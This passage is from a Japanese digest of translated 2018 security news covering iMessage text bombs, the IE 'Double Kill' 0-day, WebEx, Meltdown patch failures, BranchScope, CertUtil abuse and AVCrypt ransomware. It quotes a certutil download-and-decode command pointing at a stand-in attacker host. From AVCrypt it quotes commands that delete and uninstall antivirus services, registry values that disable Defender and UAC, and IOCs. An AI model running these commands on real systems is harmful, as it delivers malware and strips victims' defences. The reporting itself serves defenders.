     "black dot of death"(「死の黒丸」)とも呼ばれるものは、あなたが受け取っているかもしれないメッセージである。このメッセージは、中くらいの大きさの黒丸の絵文字を含み、多分、不吉なブラックホールをクリックするように勧めるPointed Finger(指差し)絵文字を同伴しているだろう。
     「黒丸」自体は無害なように思われるが、今一度隠されているメッセージの内部を見ると、簡単に、そのスマホに過剰な負荷をかける多くの不可視のUnicode文字列が存在しており、最終的に、あなたのiMessageアプリケーションは予測不能な方法でクラッシュを発生する。
     伝えられるところによると、このバグは、iOSの現在のバージョン(11.3)、並びに、iOS 11.4 betaに影響を与える。
     影響を受けたiOSユーザは、Appleからの適切なパッチを待っているが、CNETは、システムを復元できる方法に関してアドバイスしている。簡単に、あなたのスマホは破壊されてはいない。
     2月、Appleは、インド南部テルグ語で書かれた手紙を表すUnicodeシンボルを含むブービートラップされたメッセージがイタズラ者によって送信され始めた後、この類似の"killer text bomb"脆弱性を修正した。
     "chaiOS bug"として知られる類似の「テキスト爆弾」が、1月にユーザのMac、iPhone、iPadを汚損したという事実は、Appleにとって、この問題が現在進行形の問題であることを示している。
     私は速やかにAppleが"black dot of death"(「死の黒丸」)のパッチを発表するだろうと確信しているが、私はAppleが彼らのデバイスに、この種のDoS攻撃への脆弱性を発見するのは、これが最後だろうという如何なる確信も持てないことも分かっている。
     私は、これは言うまでもないと考えたいが、念の為。他の誰かに、これらテキスト爆弾攻撃を試してみようと思うな、例え冗談でさえ。全く面白くないのだから。


    伝えられるところによるとオンライン上に不可思議なIEの0-Day、"Double Kill"
    Sophos : NakedSecurity (2018/04/25)
     "Double Kill"は、暴力的ビデオゲームの世界が誇りにしている用語である。この言葉は、あなたが一撃で二人の襲撃者を倒すことを意味している。
     サイバー犯罪の世界では、中国のコンピュータ・セキュリティ企業Qihoo(奇虎360)によって与えられた名前である。この企業が主張していることは、オンラインで積極的に悪用されているInternet Explorerの0−Dayの脆弱性である。
     知っていると思うが、0-Dayの脆弱性は、公式の修正が出る前に攻撃者の手で暴かれることから、このように名付けられている。従って、鋭敏で情報通のシステム管理者でさえ、パッチを適用する時間がないことから0-Dayの名が与えられている。
     あなたが使用できるパッチが存在していない場合、次善の策は、あなたの環境でこのバグの副作用を最小化する、もしくは除外するある種の解決策である。
    残念ながら今回の場合、Qihooは、多くを提供していない。我々は、"Double Kill"脆弱性攻撃の動作方法のたいへん大雑把な詳細しか見ることができないし、攻撃者があなたに対してこの脆弱性を悪用しようとした場合に、どのように気をつけることができるのかを見ることができるだけである。
     今までに我々が知っている全てのことは、"Double Kill"攻撃が、おそらくはeMail添付ファイルとして送られてくるWordドキュメントで開始されるということである。
     あなたが、このブービートラップされたドキュメント(これは、ある種の未特定のシェルコードを含んでいるとしてQihooによって示されている)を開くと、どうやら、Internet Explorerがバックグラウンドでアクティベートされ、最終的に、視認できる如何なる警告もなしに、実行プログラムのダウンロードと実行に導かれるようである。
     Qihooによると、これは、

     攻撃を実行するためにブラウザの0-Day脆弱性を使用した最初のOffice Documentベースの脆弱性攻撃である。悪意あるOfficeドキュメントを開くと、犠牲者のコンピュータの制御を完全に奪うことのできるトロイの木馬の感染を引き起こすだろう。(中略)。ハッカーは、悪意あるWebページを含むOfficeドキュメントを配布することによって、APT攻撃(【訳註】 Advanced Persistent Threat、特定のターゲットに対して持続的に攻撃・潜伏を行い、様々な手法を駆使して執拗なスパイ行為や妨害行為などを行うタイプの攻撃の総称(IT用語辞典より))を実行する。影響を受けたユーザが、このドキュメントを開くと、この脆弱性を使用して悪意あるスクリプトとペイロードが、リモートホストからダウンロードされ実行される。

     我々が未だ知らないことが以下である。
      ・ ドキュメントのどのファイルフォーマット(例、RTF, DOC, DOCX, XLS, XLSX, PPT, PPTX)が、この脆弱性の引き金として使用されるのか。
      ・ 少なくとも具体的な詳細が明らかにされていないので、ブービートラップされたファイルがマクロを含んでいるのか、一般的に攻撃のリスクを減少するために検出されブロックされる他のアクティブスクリプトを含んでいるのかどうか?
      ・ Officeが、この悪用を動作させることを要求されるのかどうか、あるいは、他のアプリケーション(PDF Reader やビデオプレーヤのような)がトリガーになる可能性があるのかどうか?
      ・ Internet Explorerがどのようにこの攻撃に加わっているのか?
     Qihooのダイアグラムは、ドキュメントがシェルコードを含んでいることを示しているが、Internet Explorerは、このダイアグラム中に全く描かれていない。
     しかしながら、これは、0-Dayの部分それ自体ではなく、"Double Kill"脆弱性によって爆発した一つの特定のマルウェアのペイロードの詳細のようである。

     攻撃の後段で、この脆弱性攻撃は、ファイルが検出されることを回避するために、公になっているUACバイパステクニック、ファイルステガノグラフィ(実行可能コンテンツを画像ファイルの内部に隠す)、Reflective DLL Injection(メモリ中に直接プログラムをポーキングする)を使用している

    何をすべきか?

     現時点で、我々は実際の攻撃に使用された如何なるサンプルファイルも持っていない。我々は、ブービートラップされたドキュメントが、警戒することのできる何らかの兆候を持っているのか否か分かっていない。我々は、Internet Explorerが攻撃にどのように参加するのか分かっていない。そして、我々は、Officeが、"Double Kill"の引き金に使用される唯一のアプリケーションであるか否か分かっていない。
     我々が実行できることは、今まで毎回話してきた一般的なセキュリティアドバイスを繰り返すことである。「予期していないドキュメントを開くな、たとえそれが、緊急であったり、興味あったりするものであろうとも。」
     Qihooは、どうも、Microsoftにはこの攻撃の詳細を明らかにしているようである。


    WebEXに緊急の脆弱性
    The Register : Security (2018/04/19)
     Ciscoは、攻撃者に毒性化されたFlashファイルを介してターゲットマシン上で遠隔からのコード実行を可能にしていたWebEX(【訳註】 インターネットを通じて、リアルタイムなコラボレーションを実現するWeb会議クラウド サービス(Ciscoホームページより))中の緊急の脆弱性をパッチした。
     Switchzillaは本日、WebEx Business SuiteもしくはWebEx Meetings(クライアント、サーバ共)を稼働している全てのユーザに、CVE-2018-0112をパッチするために、上記ソフトウェアをアップデートするようアドバイスしている。
     ENISA(欧州ネットワーク・情報セキュリティ機関)の研究者Alexandros Zacharisによって発見され、Ciscoに通知されたこの脆弱性は、利用者がミーティングルームにアップロードしたFlashファイル(.swf)の厳密なチェックをWebExが失敗していたことから生じている。
     Zacharisは、ファイル共有ツールを介して参加者で溢れかえっている部屋に悪意ある.swfを提出することが可能なことを発見した。
     Ciscoは、Zacharisが、このバグを通知するために直接彼らにコンタクトしてきたと、Ciscoはオンライン上でこの脆弱性をターゲットにした如何なる攻撃も認識していないと発言している。このフローのCVSSスコアは9.0であり、Ciscoによって、'Critical'(緊急)の重大度指定が与えられていた。
    WebExをアップデートする(もしくは、削除する)以外、この脆弱性に対する緩和策はないとCiscoは発言している。そこで、あなた方は、間違いなくパッチが適用されているこのソフトウェアの最新版を入手することになる。
     WebEx Business Suiteを稼働している人々に関しては、このアップデートバージョンは、それぞれT32.10 と T31.23.2 である。WebEx Meetingsユーザは、クライアントソフトウェアをT32.10にアップデートし、Meetings Serverは、2.8 MR2にアップデートしなさい。
     また、パッチを取得するのは、Unified Computing System (UCS) Directorである。この場所は、Cisco技術サポートが、エンドユーザに閲覧を可能にし、データセンター管理プラットフォームによって現在ホストされているあらゆるVM上で(ターゲットの現在のパーミッションシステムに同調して)コマンドを実行することを可能にしていたバグ(CVE-2018-0238)を発見した場所である。
     この情報公開されたバグは、UCS Director Webインターフェースを介して悪用することができる。これは、攻撃者が、正当なユーザ名とパスワードを必要とすることを意味している。このバグを悪用する(VM Management Actionsパーミッション)ために必要とされるアクセスレベルは、Defaultでエンドユーザに有効になっている。  言うまでもなく、管理者は、このフローを修正するために、UCS Directorのバージョンを6.0と6.5を"Patch 3"アップデートにアップデートしなさい。DirectorやDirector Express for Big Dataの以前のバージョンを稼働している人々は、それらのビルドが脆弱性のあるバージョンと判断されていないので運が良い。


    CertUtil.exeは、アンチウィルスをバイパスしながらマルウェアをダウンロードすることを攻撃者に可能にしていた
    BleepingComputer : News>Security (2018/04/04)
     Windowsは、CertUtilと呼ばれる組み込みプログラムを持っている。このプログラムは、Windowsで認証を管理するために使用されている。このプログラムを使用することで、あなたは、証明書やWindows証明書ストアに関連する様々な機能をインストール、バックアップ、削除、管理、実行することができる。
     CertUtilの機能の一つは、証明書、あるいは、それに関連する他のファイルをリモートURLからダウンロードし、"certutil.exe -urlcache -split -f [URL] output.file"の構文を使用して、ローカルファイルとしてそれを保存する能力である。
     セキュリティ研究者Casey Smithは、2017年に、この方法はマルウェアをダウンロードするために使用することができるだろうとする彼の懸念をツイートしている。
    Smithの懸念は、攻撃者がCertUtilを悪用し、かなり長い間マルウェアをダウンロードしていたという事実で現実のものとなった。このサンプルは、2016年にCertUtilを悪用した、そして、2018年3月の最近のトロイもまた、感染させたコンピュータに様々なバッチファイルやスクリプトをダウンロードするためにCertUtilを悪用している。


    最近のトロイで使用されているCertUtil(画像をクリックすると拡大します)

     攻撃者が既にコンピュータに足がかりを持っているにも拘わらず、CertUtilを使用することを、あなたは不思議に思うだろうか? これは、一部のコンピュータがLockdown(【訳註】 セキュリティ強化のために、OSやアプリケーションなどの機能やリソースを制限すること)されている可能性があり、そのため未知のアプリケーションがプログラムをダウンロードすることができないためである。組み込みのWindowsプログラムを使用することにより、CertUtilは、インストールされているセキュリティプログラムによってホワイトリストに登録されるので、ファイルをダウンロードすることが可能になる。
     マルウェアをダウンロードし実行するために正当なWindowsプログラムを悪用することは、Windows regsvr32.exeが類似の方法で使用されている程ではない。

    セキュリティソフトをバイパスするためにCertUtil+Base64を使用する

     本日、セキュリティコンサルタントでありISCハンドラーでもあるXavier Mertensは、ハンドラダイアリを公開した。これには、CertUtilの使用に新機軸を追加している。この新機軸は、攻撃者のダウンロードが、エッジ・セキュリティ・デバイスによって未検出のままにすることをより簡単にする可能性のあるものである。この新機軸は、最初に悪意あるファイルをBase64エンコードすることで、この悪意あるファイルを無害なテキストのように見せかけ、次に、CertUtil.exeを使用して、このファイルをダウンロードさせた後、それをデコードするものである。
     既に論議したように、あなたは以下のコマンドを使用することによってCertUtil.exeを使用してファイルをダウンロードすることができる。

    certutil.exe -urlcache -split -f [URL] output.file

     このコマンドは、ファイルをそのオリジナルの形式でダウンロードし、それをそのコンピュータに保存する。この方法の問題は、ネットワーク・セキュリティ・デバイスが、そのファイルを悪意あるものとして検出し、ブロックすることにある。
     これをかい潜るために、Martensは、エッジ・デバイス(【訳註】 LANとWANもしくはインターネットを接続するネットワークデバイスの一種(Technopediaより))に無害なテキストと思わせるために、最初に悪意あるファイルをBase64エンコードするアイデアを考案している。次に、このテキストファイルをダウンロードし、"certutil.exe -decode"コマンドを使用して、Base64でエンコードされたファイルを実行ファイルにデコードしている。
     以下が、Mertensのハンドラダイアリで説明されているものである。

    C:\Temp>certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt
    C:\Temp>certutil.exe -decode bad.txt bad.exe

     この方法は、エッジ・デバイスの検出をかい潜る可能性がある。そして、安全ではないかもしれないローカルマシン上で実行ファイルに変換される。
     私は、これが実際にオンラインで使用されていることを認識していないが、MalwareHunterTeamは、certutil.exe -decode の使用は、既に使用されていると、私に告げている。その例は、これらのサンプル中で確認できる。更に、公開後、我々はまたF5 Labのこの記事を発見した。そこでは、WindowsにコインマイナーをインストールするためにCertUtil.exeを使用するキャンペーンを詳細に説明している
     更に、Kasperskyのセキュリティ研究者Fabio Assoliniは、この方法は、暫くの間ブラジル人のプログラマによって使用されてきたものであると、我々に警告した。
     お分かりのように、新しいトリックは、毎日、通常安全で正当であるとされるWindowsプログラムを活用して考えだされている。リモート認証やサーバーにアクセスするためにCertUtilを使用していない人々にとっては、インターネットに接続する能力をロックダウンしたほうがいいかもしれない。


    IntelのMeltdown脆弱性に関するMicrosoftの三回目のパッチもまた、パッチが必要かもしれない
    The Register : Security (2018/04/03)
    Microsoftが、Intelの最先端のプロセッサ中のMeltdownセキュリティ脆弱性を修正する三回目のリリースをした数日後、システム管理者達は、彼らの多くの64-bit Windows 7とServer 2008 R2が依然として適切にパッチすることが不可能であると発言している。
     120台のWindows 7 x64 PCのアドミニストレータであるPseudo(The Registerの読者Lawrence Birdmanの匿名)は、彼のマシンの4台を除く全てが最新のアップデートを取得することができなかった(このソフトウェアの調整は、WSUS(Windows Server Update Services)では、このコンピュータ用には”Not Applicable”と表示される)と発言している。
     緊急のアップデートKB4100480は、Windows 7とWindows Server 2008 R2のMeltdown用の1月と2月のセキュリティ・アップデートでMicrosoftの技術者によって偶然導入された緊急の脆弱性を解決するためのパッチ(3月初めにリリースされた)を補完するために、先週Microsoftによってリリースされた。
     3月初めのアップデートは、1月のMeitdownパッチで導入されたセキュリティ・バグCVE-2018-1038を全滅させることを企てたが、完全に効果があったというわけではなかったので、KB4100480を入手しインストールすることが必要になった。
     残念なことに、Pseudoは、WSUSは、どこかおかしいと、彼が世話をしている116台のマシン(このシステムは、この脆弱性を含む1月と2月のセキュリティアップデートの両方を適用されている)は、この最新の修正を取得できないと発言している。
     「問題は、それらがWindows 7 x64 の120台の内の4台を除く全てが'Not Applicable'として表示されることにある」と、Birdmanは、我々に告げた。
     「私が、このアップデートに同意した場合でさえ、このアップデートを必要とするマシンには適用されなかった。これは、『必要なアップデート』の検出がバグっているかのように思われる」と続けている。

    役に立たない

     我々は、この問題に関してMicrosoftに尋ねた。その応答として、偽りなくMicrosoftの形式で、役に立たない以下の声明を受け取った。「このアップデートは、WSUSの顧客に利用可能なものである。その顧客は、そのカタログからWSUSに、それをダウンロードしインポートすることができる。」
     多分、このパッチは徐々に広がっているので、一部の人々は、それを取得していないが、いつもながら、Microsoftは、混乱した顧客を暗闇の中に残したまま、説明しようともしない。
     他のアドミニストレータもまた、似たような問題に遭遇している。Woody LeonhardのWindows-watching Webサイトでのスレッドは、この件に関することが突然発生している。彼らは、本当に彼らのマシンがパッチのパッチのパッチを必要としているが、WSUSにそれを適用させることができないと、多くの人が発言している。
     「1月から3月の適格なアップデートの複数をインストールした凡そ200のWindows Server 2008 R2システムの全てのうち、KB4100480を適用できると表示したものは僅か18台でしかなかった」と、一人の専門技術者は記述している。
     「その上、我々は、WSUSを利用するので、これら200のシステムの殆ど全てが同じパッチを当てられる。」
     Microsoftの次の定例セキュリティ・リリースは、4月10日の月例アップデートである。」


    Microsoft: Windows 7とServer 2008に対するMeltdownパッチの修正パッチを公開
    The Register : Security (2018/03/29)
    Microsoftが本日、1月と2月にリリースしたセキュリティアップデートを修正するために今月初めにリリースしたセキュリティアップデートを更に修正する緊急のセキュリティアップデートをリリースした。
     1月と2月に、Microsoftは、最先端のIntel x64プロセッサ中のMeltdownチップレベル脆弱性を解消するためにWindows 7とServer 2008 R2用のパッチを発行した。残念なことに、これらのパッチは、これらのオペレーティングシステムにセキュリティ上の重大な欠陥を開けた。通常のアプリケーションとログイン・ユーザは、このアップデートをインストールすることで、現在、物理RAMの一部にアクセスし改竄することができ、それらOSの完全な制御を取得できる。
     保護されたカーネル・メモリパスワードや他の秘密を抽出するためにMeltdownを悪用しようとするプログラムや非アドミニストレータを止める代わりに、Windows 7とServer 2008 R2用のパッチは、システムRAMに対する完全な読み込みと書き込みの特権を供与した。
     3月になり、Microsoftは、誤って開けてしまったこのセキュリティ上の脆弱性を閉じるために、1月と2月のアップデートの修正を3月の月例アップデートでリリースした。
     3月のアップデートは、この脆弱性を完全に封印するものではなかった。このバグはカーネル中に残り、悪意あるソフトウェアとユーザによって悪用可能だった。

    Total Meltdown

     現在、あなたがWindows 7もしくはServer 2008 R2を使用し、MicrosoftのMeltdownパッチを適用しているのであれば、本日のCVE-2018-1038用の緊急のアップデートを入手しインストールしたほうがいい。
     スウェーデンの研究者Ulf Friskは、Windows 7やServer 2008 R2用の1月と2月のMeltdown緩和策が、それらOSを損壊することを発見した。そして、3月の月例アップデートが開始されると直ちに彼の発見を公開した。結局の所、今月のアップデートは、この脆弱性を完全に修正しなかった。そして、Microsoftは、Windows 7やServer 2008中の0-Dayの脆弱性を改善するために緊急発進しなければならなかった。
     言い換えると、Microsoftはパッチのパッチのパッチをリリースしなければならなかった。感動するほどのことでもないが、我々は、以前のMicrosoftへの格言が真実のように思われる。「どんなに早くても、バージョン 3 まではMicrosoftの製品を信頼するな。」 他方、カーネルレベル・メモリマネージメント・コードを書くことは、その時々において、絶対に本物ではないので、開発者に幾許かの同情を与えなければならない。

    The RegisterのTwitter

     追伸、我々の中にはメモリ管理ユニットのページテーブルを操作するカーネルモードのコードを書いた者もいる。それは大変厄介で苛つくものである。Microsoftよくやった。最後に上手くいったね。
    2018年3月30日、午前6時56分

     Friskは、彼が昨日まで、依然としてOSレベルのバグがあることを知っていただけだと、The Registerに告げた。彼が、今週初め、彼がこのフローは生きていたとブログしたのは、3月のアップデートが全てを解決したという確信に基づき、Microsoftセキュリティグループを祝福したものである。
     言うまでもなく、あなたがWindows 7やServer 2008 R2の何方かを所有もしくは管理しているのであれば、可能な限り早急にこの修正をテストし配備したほうがいい。


    MeltdownとSpectreの後、Intel CPUは今、BranchScope攻撃に対する脆弱性がある
    Softpedia : News > Security (2018/03/28)
     我々は未だ、数十億のデバイスに攻撃の危険を与えたMeltdownとSpectreフローを終えていないが、セキュリティ研究者達は、BranchScopeと呼ばれる新しい波状攻撃を発見した。
     BranchScopeとは何か? これは、ウィリアム・アンド・メアリー大学、カーネギーメロン大学カタール校、カリフォルニア大学リバーサイド校、ニューヨーク州立大学ビンガムトン校の四人のセキュリティ研究者によって発見された新しいサイドチャンネル攻撃(【訳註】 暗号装置の動作状況を様々な物理的手段で観察することにより、装置内部のセンシティブな情報を取得しようとする攻撃(暗号解読)方法の総称(Wikipediaより))である。この攻撃は、Intelプロセッサで稼働しているデバイスに影響を与え、MeltdownとSpectre緩和策に対して免疫があるかもしれない。
     彼らの論文によると、それらがもう少し精緻であったとしても、このBranchScope攻撃は、攻撃者が、セキュリティ脆弱性を悪用し、共有されている方向性分岐予測(【訳註】 プログラム実行の流れの中で条件分岐命令が分岐するかしないかを予測することにより、命令パイプラインの効果を可能な限り維持し、性能を高めるためのCPU内の機能(Wikipediaより))を巧みに操ることによって重要なデータ(パスワードと暗号化キーを含む)を未パッチのシステムから取得できるという点で、MeltdownやSpectreフローと同じダメージを実行することができる。
     「攻撃の成功は、主に正確なタイミングによって巧みに分岐操作を実行する能力に依存する」と、この論文は記述しており、更に、「OSをコントロールした攻撃者は、犠牲者実行タイミングを簡単に操作できる。例えば、攻撃者は、幾つかの指示を実行させた後、Enclaveコードを中断させるようにAdvanced Programmable Interrupt Controller(APIC、【訳註】 インテルにより開発された、x86アーキテクチャにおける割り込みコントローラのこと(Wikipediaより))を設定することができる。」

    Sandy Bridge, Haswell, Skylakeも影響を受ける

     この研究者達は、最近の3つのIntel Core i5、Core i7、x86_64(64-bit)プロセッサ・ファミリー(Sandy Bridge, Haswell, Skylakeを含む)で、BranchScope攻撃をデモしている。これらの攻撃の最悪の部分は、BranchScopeが拡張され、攻撃者がIntel SGX(Software Guard Extensions)エンクロージャ内で実行されているアプリケーションを対象とする、より高度で柔軟な攻撃を実行するための追加ツールを提供できることにある。
     彼らの論文(あなたがBranchScope脆弱性について知られていることの全てを学習したいのであれば、必読である)で、セキュリティ研究者達は、BranchScope攻撃のためにソフトウェアとハードウェア ベースの緩和策を提案している。それ故、我々は、インテルが、彼らのプロセッサ用に、BranchScope脆弱性を完全にパッチする新しいマイクロコード・アップデートをリリースすることを期待する。従って、あなたは常にシステムを最新にするようにしなさい。

    アップデート: Intelのスポークスマンは、以下の声明を我々に提供した。

     「我々は、これらの研究者と共に作業中である。そして、彼らが説明している方法は、既知のサイドチャンネル悪用に類似している。我々は、既知のサイドチャンネル悪用のための既存のソフトウェア緩和策(サイドチャンネル耐性暗号の使用のような)が、この論文で説明されている方法に対して効果的であると予測している。我々は、研究コミュニティとの緊密なパートナーシップが、顧客とそのデータを保護する最良の方法の一つであると確信しており、これらの研究者の協力に感謝している。」


    AVCrypt身代金要求型マルウェアはアンチウィルスソフトをアンインストールしようとする
    BleepingComputer : News>Security (2018/03/23)
     AVCryptと名付けられた新しい身代金要求型マルウェアは、コンピュータを暗号化する前に存在しているセキュリティソフトをアンインストールしようとしていることが発見された。更に、この身代金要求型マルウェアはWindows Updateを含む多くのサービスを削除し、接触情報を提供しない。この身代金要求型マルウェアはワイパー(【訳註】 すべてのデータを消し去ってしまうマルウェア。PCの持ち主に残されるのは、完全にクリーンアップされた、ほとんど動作しないハードウェアの残骸。一番有名なワイパーはShamoon(Kasperskyブログより))の可能性がある。
     この身代金要求型マルウェアを発見したMalwareHunterTeam(筆者Lawrence AbramsとMichael Gillespie)の解析で、ファイル名が単純なav2018.exeであったので、この身代金要求型マルウェアはAVCryptと名付けられた。だが、このマルウェアの開発者は、この身代金要求型マルウェアのサンプル中に発見された幾つかのデバッグメッセージに基づきLOLと名付けている可能性がある。

    デバッグメッセージ

     名前が何であれ、この感染は、我々が今まで確認していない方法でソフトウェアをアンインストールすることを企てる。これらの機能は、以下のセクションで概説する。

    AVCcryptはセキュリティソフトをアンインストールしようとする。

     既に述べたように、AvCryptが起動すると、インストールされているセキュリティソフトを犠牲者のコンピュータから削除しようとする。このマルウェアは、これを二つの方法で実行する。(1)特にWindows DefenderとMalwarebytesをターゲットにすることによって、(2)インストールされているアンチウィルスソフトを検索することによって、次に、それらを削除しようとする。
     AVCryptは最初に、MalwarebytesとWindows Defenderの適切なオペレーションに関して要求されるWindowsサービスを削除する。これは、以下のフォーマットのようなコマンドを使用して実行される。

    cmd.exe /C sc config "MBAMService" start= disabled & sc stop "MBAMService" & sc delete "MBAMService";

     次に、どのアンチウィルスソフトがWindows Security Centerに登録されているかを調べ、WMICを介して、そのアンチウィルスを削除しようとする。

    cmd.exe /C wmic product where ( Vendor like "%Emsisoft%" ) call uninstall /nointeractive & shutdown /a & shutdown /a & shutdown /a;

     だが、上述のコマンドでは、Emsisoftをアンインストールすることはできない。このコマンドが、他のアンチウィルスソフトで動作するか否かは分かっていない。

    ワイパーか、開発中に身代金要求型マルウェアなのか?

     この時点で、AVCryptは、何方の分類にも結びつく特徴があることから、開発段階の身代金要求型マルウェアなのか、ワイパーなのか明らかではない。
     ワイパーの側面として、この身代金要求型マルウェアは、起動すると様々なWindowsサービスを削除しようとする。削除されるWindowsのサービスは以下である。

    MBAMService
    MBAMSwissArmy
    MBAMChameleon
    MBAMWebProtection
    MBAMFarflt
    ESProtectionDriver
    MBAMProtection
    Schedule
    WPDBusEnum
    TermService
    SDRSVC
    RasMan
    PcaSvc
    MsMpSvc
    SharedAccess
    wscsvc
    srservice
    VSS
    swprv
    WerSvc
    MpsSvc
    WinDefend
    wuauserv

    これらのサービスが削除された後も、Windowsは機能を継続するが、おそらく、Windowsの適切なオペレーションに問題が発生するだろう。
     更に、この身代金要求型マルウェアによって作成された脅迫文は、接触情報を何も提供していない。この身代金要求型マルウェアの脅迫文は、単純に"lol n"となっているだけである。

     同時に、この感染は、リモートのTORサイトに暗号化キーをアップロードする、そして、この脅迫文の内容は単なるプレースホルダであるかもしれない。更に、この身代金要求型マルウェアが実行されると、それが起動する前に警告を表示する。そこには多くのデバッグメッセージがあるので、開発段階の身代金要求型マルウェアである可能性が十分ある。
     Microsoftは、この身代金要求型マルウェアの二つのサンプル(その何方も、私のコンピュータ中に存在している可能性がある)を検出しただけなので、この感染は現在開発中のものだと思うとBleepinComputerに伝えてきている。Microsoftは、この身代金要求型マルウェアをRansom:Win32/Pactelung.Aとして検出している。

    既に攻撃が始まっているのか、それとも単なる偶然なのか?

     私はこの身代金要求型マルウェアが開発段階のものとする見解に傾いているが、セキュリティ研究者がTwitterに投稿したところによると、日本の大学(【訳註】 中部大学)のコンピュータが、アンチウィルスソフトをアンインストールする身代金要求型マルウェアに最近感染している。
     BleepingComputerは、このメールにリストされているeMailアドレスに連絡したが、この記事を公開した時点で返信をもらっていない。

    AVCrypt暗号化プロセス

     AVCryptが実行されると、短い間アイドリング状態になり、埋め込まれているTORクライアントを抽出し、暗号化キー、タイムゾーン、犠牲者のWindowsバージョンを送信するbxp44w3qwwrmuupc.onionコマンド&コントロール サーバーに接続する。そのキーの一部としてメモリーから他のコンテンツを追加しているので、この送信中にはエラーが存在しているようである。
     そこで、これは、今までのセクションで説明したように、様々なセキュリティプログラムを削除しようとする。次に、暗号化するためのファイルをスキャンする。ファイルを暗号化すると、そのファイルは、+[original_name]にリネームされる。例えば、test.jpgと名付けられていたファイルが暗号化されると、+test.jpgにリネームされる。

    暗号化されたファイル

     ファイルが暗号化された各フォルダには、+HOW_TO_UNLOCK.txtと名付けられた脅迫文が作成される。この脅迫文には、以下に示すように、如何なる接触情報も指示も含まれていない。

    AVCryptの脅迫文

     このマルウェアが実行されている間、そのコンピュータのセキュリティを減少させるために様々なレジストリ値を追加したり削除したりもする。
     追加されるレジストリ値は以下を含む。

    HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Associations\LowRiskFileTypes     .cmd;.exe;.bat;
    HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Windows     %AppData%\[username].exe
    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\HideSCAHealth     1
    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Windows     C:\Users\User\AppData\Roaming\User.exe
    HKLM\SOFTWARE\Policies\Microsoft\Windows\System\EnableSmartScreen     0
    HKLM\SOFTWARE\Policies\Microsoft\Windows\DeviceGuard
    HKLM\SOFTWARE\Policies\Microsoft\Windows\DeviceGuard\RequirePlatformSecurityFeatures     0
    HKLM\SOFTWARE\Policies\Microsoft\Windows\DeviceGuard\LsaCfgFlags     0
    HKLM\SOFTWARE\Policies\Microsoft\Windows\DeviceGuard\HVCIMATRequired     0
    HKLM\SOFTWARE\Policies\Microsoft\Windows\DeviceGuard\HypervisorEnforcedCodeIntegrity     0
    HKLM\SOFTWARE\Policies\Microsoft\Windows\DeviceGuard\EnableVirtualizationBasedSecurity     0
    HKLM\SOFTWARE\Policies\Microsoft\Windows Defender
    HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware     1
    HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection
    HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring     1

     値が変更されるものの一部には、以下が含まれる。

    HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden     "0"     (old value="1")
    HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowInfoTip     "0"     (old value="1")
    HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden     "0"     (old value="1")
    HKLM\SOFTWARE\Microsoft\Security Center\cval     "0"     (old value="1")
    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA     "0"     (old value="1")
    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableVirtualization     "0"     (old value="1")

     実行されると、このマルウェアは、+.batと名付けられたバッチファイルを実行する。これはドロップされたあらゆるファイルをクリーンアップし、イベントログをクリアし、この身代金要求型マルウェアのプロセスを終了し、そして、このオートランエントリを削除する。

    バッチファイルの内容

     見てきたように、この身代金要求型マルウェアは感染したコンピュータを完全に破壊すると共に、同時に暗号化キーをリモートサーバにアップロードしているかのようである。それ故、これが本当に身代金要求型マルウェアなのか、身代金要求型マルウェアを装っているワイパーなのか定かでない。

    IOC

    ハッシュ

    a64dd2f21a42713131f555bea9d0a76918342d696ef6731608a9dbc57b79b32f
    58c7c883785ad27434ca8c9fc20b02885c9c24e884d7f6f1c0cc2908a3e111f2

    ネットワーク接続

    bxp44w3qwwrmuupc.onion

    関連ファイル

    +HOW_TO_UNLOCK.txt
    %AppData%\[username].exe
    %Temp%\libeay32.dll
    %Temp%\libevent-2-0-5.dll
    %Temp%\libevent_core-2-0-5.dll
    %Temp%\libevent_extra-2-0-5.dll
    %Temp%\libgcc_s_sjlj-1.dll
    %Temp%\libgmp-10.dll
    %Temp%\libssp-0.dll
    %Temp%\ssleay32.dll
    %Temp%\t.bmp
    %Temp%\t.zip
    %Temp%\tor.exe
    %Temp%\zlib1.dll

    脅迫文

    lol n


    Windowsリモートアシスタンス・ツールは標的型攻撃に使用される
    BleepingComputer : News>Security (2018/03/20)
     全てのWindowsのバージョンに搭載されているWindowsリモートアシスタンス・ツールは、狡猾なハッキングを行うことで標的型攻撃に悪用することができる。
     Nabeel Ahmed(ベルギーのセキュリティ研究者)は昨年2月にこのツールの脆弱性を発見し、10月にMicrosoftに通知した。CVE-2018-0878として追跡されるこの問題のパッチは、先週リリースされた2018年03月のMicrosoftの定例パッチに含まれていた。

    データ抽出に理想的な脆弱性

     この脆弱性は、犠牲者の認識なしにコンピュータからあらゆるファイルを抽出し、それをリモートサーバにアップロードすることを可能にするものである。
     このため、この脆弱性は、データを抽出するには最高のものであり、犠牲者のコンピュータからあらゆるファイルをコッソリ盗むために使用することができる。
     良いニュースは、この脆弱性は大量悪用攻撃できないことであり、犠牲者を欺いてリモートアシスタンス・セッションを開くにはソーシャル・エンジニアリングを必要とすることである。

    このハックの動作方法

     この脆弱性もしくはハックの動作方法を理解するには、ユーザは最初にWindowsリモートアシスタンス・ツールの動作方法を理解する必要がある。
     名前が示しているように、これはMicrosoftによって作成されたTeamViewerに類似したリモートヘルプツールであり、XP以降の全てのWindowsバージョンに同梱されている。
     誰かが、このリモートアシスタンス・ツールを介して他のユーザの支援を要請すると、このアプリケーションは"Invitation.msrcincident"と名付けられたファイルを生成する。
     支援の要請を受けたユーザはeMailを介して、あるいは、他の任意の方法で支援に同意した人に、このファイルを送信する必要がある。「支援をする者」は、「要請をした者」のコンピュータにリモートデスクトップ・セッションを介して接続するために、このファイルをダブルクリックする必要がある。
